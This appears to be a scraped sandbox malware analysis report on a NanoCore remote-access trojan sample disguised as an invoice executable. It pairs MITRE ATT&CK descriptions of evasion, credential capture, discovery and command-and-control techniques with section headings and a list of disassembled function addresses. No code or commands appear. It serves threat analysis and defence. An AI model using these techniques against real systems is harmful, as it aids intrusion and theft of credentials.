Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report G2M8C76V_INV0ICE_RECEIPT.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

AV Detection:

E-Banking Fraud:

Stealing of Sensitive Information:

Remote Access Functionality:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Function 00403225, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270
filestringcomCOMMON

Function 004053AA, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Function 0040604C, Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 00405D7C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 00405DA3, Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Function 004035E3, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 213
stringregistrylibraryCOMMON

Function 00402C5B, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 00402F01, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109
fileCOMMON

Function 0040302C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryloaderCOMMON

Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Function 0040578B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Function 738D10A0, Relevance: 6.1, APIs: 4, Instructions: 88
filememoryCOMMON

Function 004031F1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Function 00406481, Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre